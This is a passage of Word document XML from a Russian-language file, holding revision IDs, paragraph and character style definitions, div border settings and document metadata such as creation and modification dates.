    <w:rsid w:val="00AD5AA0"/>
    <w:rsid w:val="00AD6014"/>
    <w:rsid w:val="00AD71AF"/>
    <w:rsid w:val="00AE0AC0"/>
    <w:rsid w:val="00AE53AE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30F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55850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2F82"/>
    <w:rsid w:val="00D03730"/>
    <w:rsid w:val="00D040DB"/>
    <w:rsid w:val="00D046F1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31CE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2E4"/>
    <w:rsid w:val="00E34786"/>
    <w:rsid w:val="00E36F43"/>
    <w:rsid w:val="00E4013B"/>
    <w:rsid w:val="00E41B93"/>
    <w:rsid w:val="00E4237F"/>
    <w:rsid w:val="00E43F9E"/>
    <w:rsid w:val="00E54250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85B91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E6DBF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EB4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FFF"/>
    <w:rsid w:val="00FF4BF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34F8E"/>
  <w14:defaultImageDpi w14:val="96"/>
  <w15:docId w15:val="{B70C4C32-E4BF-49D8-9E76-639F1A29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1A7763"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="500" w:line="300" w:lineRule="auto"/>
      <w:ind w:left="40" w:hanging="60"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:aliases w:val="Знак Знак"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10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8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="aa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customStyle="1" w:styleId="ac">
    <w:name w:val="Заголовок Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ab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1E6BF1"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/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ae">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af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af">
    <w:name w:val="Подзаголовок Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a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0">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="000B31FA"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/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9136D7"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="22"/>
      <w:lang w:val="ru-RU" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="af3">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00E6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locked/>
    <w:rsid w:val="000B54C9"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Times New Roman"/>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style5">
    <w:name w:val="Style5"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="007D27C6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FontStyle54">
    <w:name w:val="Font Style54"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="007D27C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C2092F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C2092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C2092F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rsid w:val="000E58F0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E58F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0E58F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FontStyle25">
    <w:name w:val="Font Style25"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000E58F0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0E58F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FontStyle29">
    <w:name w:val="Font Style29"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000E58F0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rsid w:val="000E58F0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rsid w:val="000E58F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styleId="af6">
    <w:name w:val="line number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00FB22DB"/>
  </w:style>
  <w:style w:type="character" w:styleId="af7">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="0011628E"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="31">
    <w:name w:val="Body Text Indent 3"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="32"/>
    <w:rsid w:val="004A5A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5AC0"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FR1">
    <w:name w:val="FR1"/>
    <w:rsid w:val="00BC61A6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F154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2555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555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624">
          <w:marLeft w:val="48"/>
          <w:marRight w:val="48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5626">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="120"/>
                  <w:marBottom w:val="120"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="009600"/>
                    <w:left w:val="single" w:sz="6" w:space="5" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="009600"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="009600"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
          </w:divsChild>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1589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050-EB76-4123-96A9-8D379BE8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30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4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yahellio ~</cp:lastModifiedBy>
  <cp:revision>463</cp:revision>
  <cp:lastPrinted>2017-12-10T20:19:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-06-01T14:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-26T20:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>